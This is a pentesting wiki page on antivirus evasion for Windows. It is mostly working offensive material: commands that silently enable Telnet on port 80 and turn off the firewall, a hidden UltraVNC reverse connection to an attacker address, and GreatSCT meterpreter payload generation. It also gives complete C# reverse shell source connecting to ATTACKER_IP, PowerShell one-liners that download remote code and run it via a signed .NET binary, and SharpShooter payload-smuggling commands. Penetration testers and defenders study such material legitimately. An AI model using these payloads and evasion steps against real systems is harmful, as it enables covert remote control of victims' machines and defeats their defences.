HackTricks
Search…
Pentesting
Powered By GitBook
AV Bypass

Telnet Server

Until Windows10, all Windows came with a Telnet server that you could install (as administrator) doing:
1
pkgmgr /iu:"TelnetServer" /quiet
Copied!
Make it start when the system is started and run it now:
1
sc config TlntSVR start= auto obj= localsystem
Copied!
Change telnet port (stealth) and disable firewall:
1
tlntadmn config port=80
2
netsh advfirewall set allprofiles state off
Copied!

UltraVNC

Execute winvnc.exe and configure the server:
    Enable the option Disable TrayIcon
    Set a password in VNC Password
    Set a password in View-Only Password
Then, move the binary winvnc.exe and newly created file UltraVNC.ini inside the victim

Reverse connection

The attacker should execute inside his host the binary vncviewer.exe -listen 5900 so it will be prepared to catch a reverse VNC connection. Then, it should execute inside the victim: winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900

GreatSCT

1
git clone https://github.com/GreatSCT/GreatSCT.git
2
cd GreatSCT/setup/
3
./setup.sh
4
cd ..
5
./GreatSCT.py
Copied!
Inside GreatSCT:
1
use 1
2
list #Listing available payloads
3
use 9 #rev_tcp.py
4
set lhost 10.10.14.0
5
sel lport 4444
6
generate #payload is the default name
7
#This will generate a meterpreter xml and a rcc file for msfconsole
Copied!
Now start the lister with msfconsole -r file.rc and execute the xml payload with:
1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
Copied!
Current defender will terminate the process very fast.

Compiling our own reverse shell

https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

First C# Revershell

Compile it with:
1
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
Copied!
Use it with:
1
back.exe <ATTACKER_IP> <PORT>
Copied!
1
using System;
2
using System.Text;
3
using System.IO;
4
using System.Diagnostics;
5
using System.ComponentModel;
6
using System.Linq;
7
using System.Net;
8
using System.Net.Sockets;
9
10
11
namespace ConnectBack
12
{
13
public class Program
14
{
15
static StreamWriter streamWriter;
16
17
public static void Main(string[] args)
18
{
19
using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
20
{
21
using(Stream stream = client.GetStream())
22
{
23
using(StreamReader rdr = new StreamReader(stream))
24
{
25
streamWriter = new StreamWriter(stream);
26
27
StringBuilder strInput = new StringBuilder();
28
29
Process p = new Process();
30
p.StartInfo.FileName = "cmd.exe";
31
p.StartInfo.CreateNoWindow = true;
32
p.StartInfo.UseShellExecute = false;
33
p.StartInfo.RedirectStandardOutput = true;
34
p.StartInfo.RedirectStandardInput = true;
35
p.StartInfo.RedirectStandardError = true;
36
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
37
p.Start();
38
p.BeginOutputReadLine();
39
40
while(true)
41
{
42
strInput.Append(rdr.ReadLine());
43
//strInput.Append("\n");
44
p.StandardInput.WriteLine(strInput);
45
strInput.Remove(0, strInput.Length);
46
}
47
}
48
}
49
}
50
}
51
52
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
53
{
54
StringBuilder strOutput = new StringBuilder();
55
56
if (!String.IsNullOrEmpty(outLine.Data))
57
{
58
try
59
{
60
strOutput.Append(outLine.Data);
61
streamWriter.WriteLine(strOutput);
62
streamWriter.Flush();
63
}
64
catch (Exception err) { }
65
}
66
}
67
68
}
69
}
Copied!

C# using compiler

1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
Copied!
Automatic download and execution:
1
64bit:
2
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
3
4
32bit:
5
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
Copied!

C++

1
sudo apt-get install mingw-w64
2
3
i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
Copied!
Merlin, Empire, Puppy, SalsaTools https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
https://github.com/l0ss/Grouper2
Practical use of JavaScript and COM Scriptlets for Penetration Testing
Bypassing Detection for a Reverse Meterpreter Shell - Checkmate
Checkmate

Other tools

1
# Veil Framework:
2
https://github.com/Veil-Framework/Veil
3
4
# Shellter
5
https://www.shellterproject.com/download/
6
7
# Sharpshooter
8
# https://github.com/mdsecactivebreach/SharpShooter
9
# Javascript Payload Stageless:
10
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
11
12
# Stageless HTA Payload:
13
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
14
15
# Staged VBS:
16
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
17
18
# Donut:
19
https://github.com/TheWover/donut
20
21
# Vulcan
22
https://github.com/praetorian-code/vulcan
Copied!

More

GitHub - EgeBalci/sgn: Shikata ga nai (仕方がない) encoder ported into go with several improvements
GitHub
GitHub - persianhydra/Xeexe-TopAntivirusEvasion: Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) bypass Top Antivirus like BitDefender,Malwarebytes,Avast,ESET-NOD32,AVG,... & Automatically Add ICON and MANIFEST to excitable
GitHub
Last modified 8mo ago